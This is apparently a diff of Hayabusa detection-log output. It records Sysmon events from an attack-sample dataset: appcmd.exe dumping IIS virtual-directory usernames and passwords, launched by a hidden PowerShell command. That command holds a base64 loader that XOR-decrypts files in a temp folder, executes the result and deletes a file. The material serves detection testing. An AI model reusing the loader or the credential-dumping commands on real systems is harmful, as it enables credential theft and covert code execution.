+2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:vdir.name  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""ERROR ( message:Configuration error "" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""ERROR ( message:Configuration error "" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Filename: redirection.config"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGg